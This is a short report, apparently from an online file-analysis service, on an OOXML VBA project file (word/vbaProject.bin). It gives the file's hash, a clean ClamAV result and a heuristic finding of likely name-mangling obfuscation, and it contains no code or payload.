|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 102400 bytes |
SHA-256: 0d358cd1bcf233747a3fdb83038710ad44d82579405682a104007e3b09f9386e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
1019 of 2022 identifiers look randomly generated (e.g. 'a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0w') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.